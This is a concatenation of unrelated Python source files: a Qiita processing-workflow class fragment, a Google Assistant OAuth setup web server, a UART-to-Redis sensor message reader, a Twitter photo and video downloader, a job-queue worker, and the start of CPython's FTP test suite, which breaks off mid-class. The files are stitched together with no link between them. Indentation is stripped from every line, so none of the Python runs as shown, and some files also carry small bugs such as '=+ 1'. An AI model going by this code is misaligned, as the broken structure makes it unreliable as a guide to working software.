edges = qdb.sql_connection.TRN.execute_fetchindex()
nodes = {}
if edges:
nodes = {jid: ProcessingJob(jid)
for jid in set(chain.from_iterable(edges))}
edges = [(nodes[s], nodes[d]) for s, d in edges]
g.add_edges_from(edges)
# It is possible that there are root jobs that doesn't have any
# child, so they do not appear on edge list
sql = """SELECT processing_job_id
FROM qiita.processing_job_workflow_root
WHERE processing_job_workflow_id = %s"""
sql_args = [self.id]
if nodes:
sql += " AND processing_job_id NOT IN %s"
sql_args.append(tuple(nodes))
qdb.sql_connection.TRN.add(sql, sql_args)
nodes = [
ProcessingJob(jid)
for jid in qdb.sql_connection.TRN.execute_fetchflatten()]
g.add_nodes_from(nodes)
return g
def _raise_if_not_in_construction(self):
"""Raises an error if the workflow is not in construction
Raises
------
qiita_db.exceptions.QiitaDBOperationNotPermittedError
If the workflow is not in construction
"""
with qdb.sql_connection.TRN:
# To know if the workflow is in construction or not it suffices
# to look at the status of the root jobs
sql = """SELECT DISTINCT processing_job_status
FROM qiita.processing_job_workflow_root
JOIN qiita.processing_job USING (processing_job_id)
JOIN qiita.processing_job_status
USING (processing_job_status_id)
WHERE processing_job_workflow_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
res = qdb.sql_connection.TRN.execute_fetchflatten()
# If the above SQL query returns a single element and the value
# is different from in construction, it means that all the jobs
# in the workflow are in the same status and it is not
# 'in_construction', hence raise the error. If the above SQL query
# returns more than value (len(res) > 1) it means that the workflow
# is no longer in construction cause some jobs have been submited
# for processing. Note that if the above query doesn't retrun any
# value, it means that no jobs are in the workflow and that means
# that the workflow is in construction.
if (len(res) == 1 and res[0] != 'in_construction') or len(res) > 1:
# The workflow is no longer in construction, raise an error
raise qdb.exceptions.QiitaDBOperationNotPermittedError(
"Workflow not in construction")
def add(self, dflt_params, connections=None, req_params=None,
opt_params=None, force=False):
"""Adds a new job to the workflow
Parameters
----------
dflt_params : qiita_db.software.DefaultParameters
The DefaultParameters object used
connections : dict of {qiita_db.processing_job.ProcessingJob:
{str: str}}, optional
Dictionary keyed by the jobs in which the new job depends on,
and values is a dict mapping between source outputs and new job
inputs
req_params : dict of {str: object}, optional
Any extra required parameter values, keyed by parameter name.
Default: None, all the requried parameters are provided through
the `connections` dictionary
opt_params : dict of {str: object}, optional
The optional parameters to change from the default set, keyed by
parameter name. Default: None, use the values in `dflt_params`
force : bool
Force creation on duplicated parameters
Raises
------
qiita_db.exceptions.QiitaDBOperationNotPermittedError
If the workflow is not in construction
"""
with qdb.sql_connection.TRN:
self._raise_if_not_in_construction()
if connections:
# The new Job depends on previous jobs in the workflow
req_params = req_params if req_params else {}
# Loop through all the connections to add the relevant
# parameters
for source, mapping in viewitems(connections):
source_id = source.id
for out, in_param in viewitems(mapping):
req_params[in_param] = [source_id, out]
new_job = ProcessingJob.create(
self.user, qdb.software.Parameters.from_default_params(
dflt_params, req_params, opt_params=opt_params), force)
# SQL used to create the edges between jobs
sql = """INSERT INTO qiita.parent_processing_job
(parent_id, child_id)
VALUES (%s, %s)"""
sql_args = [[s.id, new_job.id] for s in connections]
qdb.sql_connection.TRN.add(sql, sql_args, many=True)
qdb.sql_connection.TRN.execute()
else:
# The new job doesn't depend on any previous job in the
# workflow, so it is a new root job
new_job = ProcessingJob.create(
self.user, qdb.software.Parameters.from_default_params(
dflt_params, req_params, opt_params=opt_params), force)
sql = """INSERT INTO qiita.processing_job_workflow_root
(processing_job_workflow_id, processing_job_id)
VALUES (%s, %s)"""
sql_args = [self.id, new_job.id]
qdb.sql_connection.TRN.add(sql, sql_args)
qdb.sql_connection.TRN.execute()
return new_job
def remove(self, job, cascade=False):
"""Removes a given job from the workflow
Parameters
----------
job : qiita_db.processing_job.ProcessingJob
The job to be removed
cascade : bool, optional
If true, remove the also the input job's children. Default: False.
Raises
------
qiita_db.exceptions.QiitaDBOperationNotPermittedError
If the workflow is not in construction
If the job to be removed has children and `cascade` is `False`
"""
with qdb.sql_connection.TRN:
self._raise_if_not_in_construction()
# Check if the given job has children
children = list(job.children)
if children:
if not cascade:
raise qdb.exceptions.QiitaDBOperationNotPermittedError(
"Can't remove job '%s': it has children" % job.id)
else:
# We need to remove all job's children, remove them first
# and then remove the current job
for c in children:
self.remove(c, cascade=True)
# Remove any edges (it can only appear as a child)
sql = """DELETE FROM qiita.parent_processing_job
WHERE child_id = %s"""
qdb.sql_connection.TRN.add(sql, [job.id])
# Remove as root job
sql = """DELETE FROM qiita.processing_job_workflow_root
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [job.id])
# Remove the input reference
sql = """DELETE FROM qiita.artifact_processing_job
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [job.id])
# Remove the job
sql = """DELETE FROM qiita.processing_job
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [job.id])
qdb.sql_connection.TRN.execute()
def submit(self):
"""Submits the workflow to execution
Raises
------
qiita_db.exceptions.QiitaDBOperationNotPermittedError
If the workflow is not in construction
"""
with qdb.sql_connection.TRN:
self._raise_if_not_in_construction()
g = self.graph
# In order to avoid potential race conditions, we are going to set
# all the children in 'waiting' status before submitting
# the root nodes
in_degrees = g.in_degree()
roots = []
for job, degree in viewitems(in_degrees):
if degree == 0:
roots.append(job)
else:
job._set_status('waiting')
for job in roots:
job.submit()
|
hassio_oauth.py
|
"""Run small webservice for oath."""
import json
import sys
from pathlib import Path
import threading
import time
import cherrypy
from requests_oauthlib import OAuth2Session
from google.oauth2.credentials import Credentials
HEADERS = str("""
<link rel="icon" href="/static/favicon.ico?v=1">
<link href="/static/css/style.css" rel="stylesheet">
<link href="https://fonts.googleapis.com/css2?family=Roboto&display=swap" rel="stylesheet">
""")
class oauth2Site(object):
"""Website for handling oauth2."""
def __init__(self, user_data, cred_file):
"""Init webpage."""
self.cred_file = cred_file
self.user_data = user_data
self.oauth2 = OAuth2Session(
self.user_data['client_id'],
redirect_uri='urn:ietf:wg:oauth:2.0:oob',
scope="https://www.googleapis.com/auth/assistant-sdk-prototype"
)
self.auth_url, _ = self.oauth2.authorization_url(self.user_data['auth_uri'], access_type='offline', prompt='consent')
@cherrypy.expose
def index(self):
"""Landing page."""
return str("""<html>
<head>{headers}</head>
<body>
<form method="get" action="token">
<div class="card">
<div class="card-content">
<img src="/static/logo.png" alt="Google Assistant Logo" />
<h1>Google Assistant SDK</h1>
<p>Initial setup</p>
<ol>
<li><a href="{url}" target="_blank">Get a code from Google here</a></li>
<li><input type="text" value="" name="token" placeholder="Paste the code here" /></li>
</ol>
</div>
<div class="card-actions">
<button type="submit">CONNECT</button>
</div>
</div>
</form>
</body>
</html>""").format(url=self.auth_url, headers=HEADERS)
@cherrypy.expose
def token(self, token):
"""Read access token and process it."""
try:
self.oauth2.fetch_token(self.user_data['token_uri'], client_secret=self.user_data['client_secret'], code=token)
except Exception as e:
cherrypy.log("Error with the given token: {error}".format(error=str(e)))
cherrypy.log("Restarting authentication process.")
raise cherrypy.HTTPRedirect('/')
# create credentials
credentials = Credentials(
self.oauth2.token['access_token'],
refresh_token=self.oauth2.token.get('refresh_token'),
token_uri=self.user_data['token_uri'],
client_id=self.user_data['client_id'],
client_secret=self.user_data['client_secret'],
scopes=self.oauth2.scope
)
# write credentials json file
with self.cred_file.open('w') as json_file:
json_file.write(json.dumps({
'refresh_token': credentials.refresh_token,
'token_uri': credentials.token_uri,
'client_id': credentials.client_id,
'client_secret': credentials.client_secret,
'scopes': credentials.scopes,
}))
threading.Thread(target=self.exit_app).start()
return str("""<html>
<head>{headers}</head>
<body>
<div class="card">
<div class="card-content">
<img src="/static/logo.png" alt="Google Assistant Logo" />
<h1>Google Assistant SDK</h1>
<p>Setup completed.</p>
<p>You can now close this window.</p>
</div>
</div>
</body>
</html>""").format(url=self.auth_url, headers=HEADERS)
def exit_app(self):
time.sleep(2)
cherrypy.engine.exit()
def hide_access_logs():
"""Hide file access logging for cleaner logs"""
access_log = cherrypy.log.access_log
for handler in tuple(access_log.handlers):
access_log.removeHandler(handler)
if __name__ == '__main__':
oauth_json = Path(sys.argv[1])
cred_json = Path(sys.argv[2])
with oauth_json.open('r') as data:
user_data = json.load(data)['installed']
hide_access_logs()
cherrypy.config.update({'server.socket_port': 9324, 'server.socket_host': '0.0.0.0'})
cherrypy.quickstart(oauth2Site(user_data, cred_json), config={
'/static': {
'tools.staticdir.on': True,
'tools.staticdir.dir': '/usr/share/public'
}
})
|
msg_uart_reader.py
|
#!/usr/bin/env python3
import argparse
import serial
import time
import redis
import logging
import traceback
import threading
import queue
import sys,os
sys.path.append(os.path.abspath(os.path.dirname(__file__))+"/lib")
# import message_object
from message_object import MessageObject
def redis_connection_open(host,port,database):
redis_conn = redis.Redis(host=host,port=port,db=database)
return redis_conn
def redis_connection_close(redis):
redis.close()
return True
def redis_write_message(msg,redis_conn,redis_list):
return redis_conn.lpush(redis_list, msg)
def validate_deviceid_drop_list(device_id,drop_list):
if device_id in drop_list:
return True
return False
def write_message_to_storage(processing_queue,redis_lists):
while True:
msg = processing_queue.get()
msg_received_count =+ 1
logging.debug("Processing {sensor_id}:{measurment_id}:{cycle}" \
.format(sensor_id=msg.get_device_id(),measurment_id=msg.get_measure_code(),cycle=msg.get_cycle_number())
)
if validate_deviceid_drop_list(msg.get_device_id(),msg_drop_by_deviceid):
processing_queue.task_done()
continue
# writing to file
try:
radio_log.write("{msgd}\n".format(msgd=msg.export_message()))
if msg_received_count % 100 == 0:
logging.info("Messages processed: {msg_c}".format(msg_c=msg_received_count))
radio_log.flush()
except Exception:
traceback.print_exc()
logging.error(traceback.print_exc())
# writing to redis
for r_list in redis_lists:
try:
redis_writing_status = redis_write_message(msg=msg.export_message(),redis_conn=redis_connection,redis_list=r_list)
if redis_writing_status == False:
logging.error("Problem with writing message to redis database")
except Exception:
traceback.print_exc()
logging.error(traceback.print_exc())
processing_queue.task_done()
####
uart_speed = 460800
uart_port = '/dev/ttyAMA0'
redis_server = "localhost"
redis_port = 6379
redis_lists = ["metrics_pubsub","metrics_graphite","metrics_webapi"]
redis_database = 0
msg_logger_file = "{homedir}/radio_msg.log".format(homedir=os.path.expanduser("~"))
msg_logger_debug = "{homedir}/msg_uart_reader.log".format(homedir=os.path.expanduser("~"))
msg_received_count = 0
msg_drop_by_deviceid = ["99"]
messages_queue = queue.Queue()
# CLI parser
cli_parser = argparse.ArgumentParser(description='Script for getting messages from RPI UART and putting them into redis database')
cli_parser.add_argument('--uart-speed', action='store', type=int, required=False, default=uart_speed,help="UART port speed")
cli_parser.add_argument('--uart-port', action='store', type=str, required=False, default=uart_port,help="UART port in OS")
cli_parser.add_argument('--redis-port', action='store', type=int, required=False, default=redis_port,help="Redis port to connect too")
cli_parser.add_argument('--redis-server', action='store', type=str, required=False, default=redis_server,help="Redis server host address")
cli_parser.add_argument('--redis-list', action='append', type=str, required=False, default=redis_lists,help="On which Redis list I should work")
cli_parser.add_argument('--redis-database', action='store', type=int, required=False, default=redis_database,help="On which Redis list I should work")
cli_parser.add_argument('--logger-file', action='store', type=str, required=False, default=msg_logger_file,help="Name of the file to store data (beside Redis)")
cli_parser.add_argument('--logger-debug',action='store', type=str, required=False, default=msg_logger_debug, help="File with internal debug and other logs")
cli_args = cli_parser.parse_args()
logging.basicConfig(
format='%(asctime)s %(levelname)s [%(threadName)10s]: %(message)s',
datefmt='%Y/%m/%d %H:%M:%S',
level=logging.DEBUG,
handlers=[
logging.FileHandler(cli_args.logger_debug),
logging.StreamHandler()
]
)
logging.info("Setting up env")
if __name__ == '__main__':
# create serial handler
logging.info("Setting up serial connection")
serial_proxy = serial.Serial(cli_args.uart_port, cli_args.uart_speed, timeout=1)
serial_proxy.flush()
# open redis communication
logging.info("Setting up Redis connection")
redis_connection = redis_connection_open(host=cli_args.redis_server,port=cli_args.redis_port,database=cli_args.redis_database)
logging.info("Setting up local file for writing")
radio_log = open(cli_args.logger_file,'a')
logging.info("Setting up threads")
thread_msg_writer = threading.Thread(name="msgWriter", target=write_message_to_storage, args=(messages_queue,cli_args.redis_list))
thread_msg_writer.setDaemon(True)
thread_msg_writer.start()
logging.info("Reading messages from serial in loop")
while True:
if serial_proxy.in_waiting > 0:
try:
line = serial_proxy.readline().decode('ascii').strip()
logging.info("RAW MSG received: {msg}".format(msg=line))
if MessageObject.detect_version(line):
msg = MessageObject(line)
# put message to queue for further processing
if msg.validate() == True:
messages_queue.put(msg)
logging.debug("Message queued: {sensor_id}:{measurment_id}:{cycle}" \
.format(sensor_id=msg.get_device_id(),measurment_id=msg.get_measure_code(),cycle=msg.get_cycle_number())
)
else:
logging.warning("msg decoding erros")
logging.debug("Parsing errors: {err}".format(err = ",".join(msg.get_validation_errors())))
except Exception:
traceback.print_exc()
logging.error(traceback.print_exc())
messages_queue.join()
redis_connection_close(redis_connection)
radio_log.flush()
radio_log.close()
|
twitter.py
|
# MIT License
#
# Copyright (c) 2019 Philip Woldhek
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging
import signal
import sys
from os import getcwd
from pathlib import Path
from pickle import dump
from pickle import load
from queue import Queue
from re import compile
from threading import Thread
from time import sleep
from urllib.parse import urlparse
import requests
import twint
import youtube_dl
from bs4 import BeautifulSoup
working_dir = getcwd()
class Twitter(object):
def __init__(self, usernames, location, get_videos=True, keep_log=True,
ignore_errors=True, get_photos=True, logger=""):
self.get_photos = get_photos
self.get_videos = get_videos
self.queue = Queue()
self.crawling = True
self.usernames = usernames
self.ignore_errors = ignore_errors
self.download_folder = Path(location, "twitter")
self.logging = keep_log
if self.logging:
self.logger = logging.getLogger(logger)
@staticmethod
def get_soup(html):
if html is not None:
soup = BeautifulSoup(html, 'lxml')
return soup
else:
return
@staticmethod
def get_tweets(target):
c = twint.Config()
c.Username = target
c.Resume = str(Path(working_dir, "resume", "{0}_history_ids.txt".format(target)))
c.Store_object = True
c.Hide_output = True
c.Media = True
twint.run.Search(c)
tweets = twint.output.tweets_list
photo_url = []
video_url = []
for item in tweets:
url = "https://twitter.com/statuses/{0}".format(item.id)
if item.photos:
photo_url.append(url)
if item.video:
video_url.append(url)
tweets.clear()
return target, photo_url, video_url
def download_photos(self, target, urls):
if urls:
location = Path(self.download_folder, target)
photo_location = Path(location, "photos")
if not location.is_dir():
location.mkdir()
if not photo_location.is_dir():
photo_location.mkdir()
headers = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/74.0.3729.169 Safari/537.36'}
for tweet in urls:
try:
result = requests.get(tweet, headers)
except Exception as e:
self.logger.error(e)
if not self.ignore_errors:
exit(1)
continue
if result.status_code is 200:
content = result.content
soup = self.get_soup(content)
for link in soup.findAll('img', attrs={'src': compile("^https://pbs.twimg.com/media")}):
photo_url = link['src']
url_obj = urlparse(photo_url)
file_name = url_obj.path.replace("/media/", "")
path = str(Path(photo_location, file_name))
if not Path(path).is_file():
with open(path, "wb") as file:
file.write(requests.get(photo_url).content)
else:
self.logger.error("Error requesting the webpage: {0}".format(result.status_code))
if not self.ignore_errors:
exit(1)
def download_videos(self, target, urls):
if urls:
location = Path(self.download_folder, target)
video_location = Path(location, "videos")
if not location.is_dir():
location.mkdir()
if not video_location.is_dir():
video_location.mkdir()
for tweet in urls:
try:
download_path = str(Path(video_location, "%(id)s.%(ext)s"))
ydl_opts = {
"outtmpl": download_path,
"quiet": True,
"logger": self.logger,
"ignoreerrors:": self.ignore_errors
}
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
ydl.download([tweet, ])
except Exception as y:
self.logger.error(y)
if not self.ignore_errors:
exit(1)
if len(urls) > 200:
sleep(2)
def sigterm_handler(self):
"""
possible parameters: signal, frame
"""
self.dump_queue()
sys.exit(0)
def dump_queue(self):
with open("queue", "w") as file:
dump(self.queue, file, protocol=4, fix_imports=False)
def load_queue(self):
with open("queue", "r") as file:
self.queue = load(file, fix_imports=False, encoding="bytes")
def downloader(self):
if not self.download_folder.is_dir():
self.download_folder.mkdir()
while not self.queue.empty() or self.crawling:
tweets = self.queue.get()
if self.logging:
if not tweets[1] and not tweets[2]:
pass
elif not tweets[1] and tweets[2]:
self.logger.info("{0}: downloading {1} videos".format(tweets[0], len(tweets[2])))
elif not tweets[2] and tweets[1]:
self.logger.info("{0}: downloading {1} photos".format(tweets[0], len(tweets[1])))
else:
self.logger.info(
"{0}: downloading {1} photos and {2} videos".format(tweets[0], len(tweets[1]), len(tweets[2])))
if self.get_photos:
self.download_photos(tweets[0], tweets[1])
if self.logging:
if not tweets[1]:
pass
else:
self.logger.info("{0}: photo download complete!".format(tweets[0]))
if self.get_videos:
self.download_videos(tweets[0], tweets[2])
if self.logging:
if not tweets[2]:
pass
else:
self.logger.info("{0}: video download complete!".format(tweets[0]))
if self.queue.qsize() > 0:
self.logger.info("{0} items left in the download queue".format(self.queue.qsize()))
if self.logging:
self.logger.info("Done downloading!")
def crawler(self):
resume_location = Path(working_dir, "resume")
if not resume_location.is_dir():
resume_location.mkdir()
counter = len(self.usernames)
for username in self.usernames:
if self.logging:
self.logger.info("crawling {0}".format(username))
tweets = self.get_tweets(username)
self.queue.put(tweets)
counter -= 1
if self.logging:
self.logger.info("{0} items left in crawler queue".format(counter))
self.crawling = False
if self.logging:
self.logger.info("Done crawling!")
def start(self):
if self.logging:
self.logger.info("Starting twitter module with a queue size of {0}".format(len(self.usernames)))
signal.signal(signal.SIGTERM, self.sigterm_handler)
Thread(target=self.downloader).start()
self.crawler()
def worker(usernames, location):
t = Twitter(usernames=usernames, location=location, logger="SMDL.Twitter")
t.start()
|
slave.py
|
#! /usr/bin/env python
from __future__ import division
from __future__ import print_function
import os
import sys
import time
import traceback
from builtins import object
from builtins import range
from builtins import str
from past.utils import old_div
from qs.rpcclient import ServerProxy
def short_err_msg():
etype, val, tb = sys.exc_info()
msg = []
a = msg.append
a(etype.__name__)
a(": ")
a(str(val))
file, lineno, name, line = traceback.extract_tb(tb)[-1]
a(" in function %s, file %s, line %s" % (name, file, lineno))
return "".join(msg)
class Worker(object):
def __init__(self, proxy):
self.proxy = proxy
def dispatch(self, job):
self.job = job
self.jobid = job["jobid"]
self.priority = job["priority"]
self.jobid_prefix = None
method = job["channel"]
m = getattr(self, "rpc_" + method, None)
if m is None:
raise RuntimeError("no such method %r" % (method,))
kwargs = job.get("payload") or dict()
tmp = {}
for k, v in list(kwargs.items()):
if isinstance(k, str):
tmp[str(k)] = v
else:
tmp[k] = v
return m(**tmp)
def q_set_info(self, info):
return self.proxy.q_set_info(jobid=self.jobid, info=info)
def q_add(
self, channel, payload=None, jobid=None, prefix=None, wait=False, timeout=None, ttl=None
):
"""call q_add on proxy with the same priority as the current job"""
if jobid is None and prefix is not None:
jobid = "%s::%s" % (prefix, channel)
return self.proxy.q_add(
channel=channel,
payload=payload,
priority=self.priority,
jobid=jobid,
wait=wait,
timeout=timeout,
ttl=ttl,
)
def q_add_w(self, channel, payload=None, jobid=None, timeout=None):
r = self.proxy.q_add(
channel=channel,
payload=payload,
priority=self.priority,
jobid=jobid,
wait=True,
timeout=timeout,
)
error = r.get("error")
if error is not None:
raise RuntimeError(error)
return r["result"]
def main(
commands, host="localhost", port=None, numthreads=10, num_procs=0, numgreenlets=0, argv=None
):
if port is None:
port = 14311
channels = []
skip_channels = []
if argv:
import getopt
try:
opts, args = getopt.getopt(
argv, "c:s:", ["host=", "port=", "numthreads=", "numprocs=", "channel=", "skip="]
)
except getopt.GetoptError as err:
print(str(err))
sys.exit(10)
for o, a in opts:
if o == "--host":
host = a
if o == "--port":
port = int(a)
if o == "--numthreads":
numthreads = int(a)
num_procs = 0
if o == "--numprocs":
num_procs = int(a)
numthreads = 0
if o == "-c" or o == "--channel":
channels.append(a)
if o == "-s" or o == "--skip":
skip_channels.append(a)
class WorkHandler(Worker, commands):
pass
available_channels = []
for x in dir(WorkHandler):
if x.startswith("rpc_"):
available_channels.append(x[len("rpc_") :])
available_channels.sort()
if not channels:
channels = available_channels
else:
for c in channels:
assert c in available_channels, "no such channel: %s" % c
for c in skip_channels:
channels.remove(c)
assert channels, "no channels"
if num_procs:
def check_parent():
if os.getppid() == 1:
print("parent died. exiting.")
os._exit(0)
else:
def check_parent():
pass
def handle_one_job(qs):
sleeptime = 0.5
while 1:
try:
job = qs.qpull(channels=channels)
break
except Exception as err:
check_parent()
print("Error while calling pulljob:", str(err))
time.sleep(sleeptime)
check_parent()
if sleeptime < 60:
sleeptime *= 2
check_parent()
# print "got job:", job
try:
result = WorkHandler(qs).dispatch(job)
except Exception as err:
print("error:", err)
try:
qs.qfinish(jobid=job["jobid"], error=short_err_msg())
traceback.print_exc()
except:
pass
return
try:
qs.qfinish(jobid=job["jobid"], result=result)
except:
pass
def start_worker():
qs = ServerProxy(host=host, port=port)
while 1:
handle_one_job(qs)
print("pulling jobs from", "%s:%s" % (host, port), "for", ", ".join(channels))
def run_with_threads():
import threading
for i in range(numthreads):
t = threading.Thread(target=start_worker)
t.start()
try:
while True:
time.sleep(2 ** 26)
finally:
os._exit(0)
def run_with_procs():
children = set()
while 1:
while len(children) < num_procs:
try:
pid = os.fork()
except:
print("failed to fork child")
time.sleep(1)
continue
if pid == 0:
try:
qs = ServerProxy(host=host, port=port)
handle_one_job(qs)
finally:
os._exit(0)
# print "forked", pid
children.add(pid)
try:
pid, st = os.waitpid(-1, 0)
except OSError:
continue
# print "done", pid
try:
children.remove(pid)
except KeyError:
pass
def run_with_gevent():
from qs.misc import CallInLoop
import gevent.pool
pool = gevent.pool.Pool()
for i in range(numgreenlets):
pool.spawn(CallInLoop(1.0, start_worker))
pool.join()
if numgreenlets > 0:
run_with_gevent()
elif num_procs > 0:
run_with_procs()
elif numthreads > 0:
run_with_threads()
else:
assert 0, "bad"
if __name__ == "__main__":
class Commands(object):
def rpc_divide(self, a, b):
print("rpc_divide", (a, b))
return old_div(a, b)
main(Commands, num_procs=2)
|
test_ftplib.py
|
"""Test script for ftplib module."""
# Modified by Giampaolo Rodola' to test FTP class, IPv6 and TLS
# environment
import ftplib
import asyncore
import asynchat
import socket
import StringIO
import errno
import os
try:
import ssl
except ImportError:
ssl = None
from unittest import TestCase
from test import test_support
from test.test_support import HOST
threading = test_support.import_module('threading')
# the dummy data returned by server over the data channel when
# RETR, LIST and NLST commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000
LIST_DATA = 'foo\r\nbar\r\n'
NLST_DATA = 'foo\r\nbar\r\n'
class DummyDTPHandler(asynchat.async_chat):
dtp_conn_closed = False
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
def handle_read(self):
self.baseclass.last_received_data += self.recv(1024)
def handle_close(self):
# XXX: this method can be called many times in a row for a single
# connection, including in clear-text (non-TLS) mode.
# (behaviour witnessed with test_data_connection)
if not self.dtp_conn_closed:
self.baseclass.push('226 transfer complete')
self.close()
self.dtp_conn_closed = True
def handle_error(self):
raise
class DummyFTPHandler(asynchat.async_chat):
dtp_handler = DummyDTPHandler
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.set_terminator("\r\n")
self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.rest = None
self.push('220 welcome')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = ''.join(self.in_buffer)
self.in_buffer = []
if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data + '\r\n')
def cmd_port(self, arg):
addr = map(int, arg.split(','))
ip = '%d.%d.%d.%d' %tuple(addr[:4])
port = (addr[4] * 256) + addr[5]
s = socket.create_connection((ip, port), timeout=2)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
sock = socket.socket()
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(2)
ip, port = sock.getsockname()[:2]
ip = ip.replace('.', ',')
p1, p2 = divmod(port, 256)
self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=2)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
sock = socket.socket(socket.AF_INET6)
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(2)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' %port)
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' %arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_rest(self, arg):
self.rest = arg
self.push('350 rest ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
if self.rest is not None:
offset = int(self.rest)
else:
offset = 0
self.dtp.push(RETR_DATA[offset:])
self.dtp.close_when_done()
self.rest = None
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accept(self):
conn, addr = self.accept()
self.handler = self.handler(conn)
self.close()
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
if ssl is not None:
CERTFILE = os.path.join(os.path.dirname(__file__), "keycert.pem")
class SSLConnection(object, asyncore.dispatcher):
"""An asyncore.dispatcher subclass supporting TLS/SSL."""
_ssl_accepting = False
_ssl_closing = False
def secure_connection(self):
self.socket = ssl.wrap_socket(self.socket, suppress_ragged_eofs=False,
certfile=CERTFILE, server_side=True,
do_handshake_on_connect=False,
ssl_version=ssl.PROTOCOL_SSLv23)
self._ssl_accepting = True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError, err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except socket.error, err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def _do_ssl_shutdown(self):
self._ssl_closing = True
try:
self.socket = self.socket.unwrap()
except ssl.SSLError, err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
except socket.error, err:
# Any "socket error" corresponds to a SSL_ERROR_SYSCALL return
# from OpenSSL's SSL_shutdown(), corresponding to a
# closed socket condition. See also:
# http://www.mail-archive.com/openssl-users@openssl.org/msg60710.html
pass
self._ssl_closing = False
super(SSLConnection, self).close()
def handle_read_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_read_event()
def handle_write_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
